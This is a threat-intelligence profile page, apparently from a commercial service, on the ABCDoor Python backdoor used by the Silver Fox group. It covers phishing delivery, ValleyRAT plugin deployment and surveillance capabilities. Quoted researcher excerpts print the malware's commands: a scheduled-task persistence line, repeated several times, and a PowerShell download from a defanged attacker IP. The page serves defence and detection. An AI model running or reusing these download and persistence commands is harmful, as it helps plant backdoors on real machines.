ABCDoor is a previously undocumented Python-based backdoor associated with the Silver Fox threat group and observed in active operations since at least late 2024, with confirmed real-world use from the first quarter of 2025 onward. It has been delivered as part of multi-stage intrusion chains in which Silver Fox used phishing campaigns themed around tax authorities to target organizations in sectors including industrial, consulting, trade, retail, transportation, technology, education, and state-owned enterprises, particularly in Asia. In documented campaigns, ABCDoor was deployed through custom ValleyRAT plugins after initial compromise by modified RustSL-based loaders and ValleyRAT components, indicating its role as a secondary payload for sustained remote access and operator control.
The malware is implemented in Python and compiled in part with Cython, and is typically deployed together with a bundled Python runtime. It communicates with command-and-control infrastructure over HTTPS using Socket.IO and supports a broad set of backdoor functions. Confirmed capabilities include collection of system information, file operations, process management, clipboard theft, screenshot capture, screen streaming, remote mouse and keyboard control, self-update, and self-removal. Its use of bundled multimedia tooling enables screen capture and broadcasting functionality. ABCDoor also establishes persistence on infected Windows systems through autorun mechanisms and scheduled task execution, supporting durable access.
Operationally, ABCDoor reflects Silver Fox’s expanding malware ecosystem alongside ValleyRAT, Atlas RAT, RomulusLoader, and SilentRunLoader. Observed delivery chains show that Silver Fox uses layered loaders, geofencing, anti-analysis checks, and segmented infrastructure to reduce detection and tailor infections by region. ABCDoor’s deployment through ValleyRAT plugins and its surveillance-oriented feature set make it suitable for post-compromise remote administration, monitoring, and data theft on victim endpoints.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
This new development indicates Silver Fox is actively refining its tradecraft, expanding its arsenal with malware families like Atlas RAT, ABCDoor, RomulusLoader, and SilentRunLoader.
27 distinct techniques documented for this family, organized by ATT&CK tactic.
The activity involved using phishing emails that mimic correspondence from the Income Tax Department of India in December 2025, followed by a similar campaign aimed at Russian entities.
Обе волны имели почти идентичную структуру: фишинговые письма оформлялись как официальные уведомления о проведении налоговых проверок или предлагали загрузить архив с «перечнем налоговых нарушений»... В декабрьской рассылке вредоносный код содержался непосредственно в приложенных к письму файлах.
В планировщике задач. Для этого зловред выполняет следующую команду: cmd.exe /c "schtasks /create /sc minute /mo 1 /tn "AppClient" /tr "<path_to_pythonw.exe> -m appclient" /f"
С помощью PowerShell: powershell.exe -Command ... Invoke-WebRequest -Uri 'hxxp://154.82.81[.]205/YD20251001143052.zip' ...
После загрузки DLL-модуль распаковывает архив ... и запускает файл update.bat посредством следующей команды: cmd.exe /c "C:\Users\<user>\AppData\Local\appclient\update.bat"
Скопировав файлы, скрипт запускает Python-модуль appclient с помощью легитимного инструмента pythonw: start "" /B "%DES_DIR%\python\pythonw.exe" -m appclient
В планировщике задач. Для этого зловред выполняет следующую команду: cmd.exe /c "schtasks /create /sc minute /mo 1 /tn "AppClient" /tr "<path_to_pythonw.exe> -m appclient" /f"
В планировщике задач. Для этого зловред выполняет следующую команду: cmd.exe /c "schtasks /create /sc minute /mo 1 /tn "AppClient" /tr "<path_to_pythonw.exe> -m appclient" /f"
оригинальная версия RustSL по умолчанию шифрует все строки и добавляет мусорные инструкции для усложнения анализа... Запускаемый JS-скрипт сильно обфусцирован
The loader is disguised with a PDF or Excel file icon to avoid raising suspicion.
ABCDoor is able to stay hidden for extended periods while quietly collecting screen data, exfiltrating clipboard contents, managing files, and emulating mouse and keyboard input on the victim’s machine.
Бэкдор построен на основе Python-библиотек asyncio и Socket.IO. Он взаимодействует с C2 по протоколу HTTPS
98 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
6 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A malware family listed as part of Silver Fox's expanding arsenal.
ABCDoor is a newly documented Python-based backdoor compiled with Cython 3.0.7. It is delivered through a custom ValleyRAT plugin, installed with a bundled Python environment, and abuses ffmpeg.exe for screen capture and broadcasting. It persists via the Windows Run key and a scheduled task named 'AppClient,' hides under C:\ProgramData\Tailscale, and can collect screen data, exfiltrate clipboard contents, manage files, and emulate mouse and keyboard input.
A previously undocumented Python-based backdoor used for data exfiltration and remote control, delivered via a ValleyRAT plugin in phishing-led campaigns.
A previously undocumented Python-based backdoor used by Silver Fox. It communicates over HTTPS, supports persistence, updates and self-removal, collects screenshots, enables remote mouse and keyboard control, performs file system operations, manages processes, and exfiltrates clipboard data.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.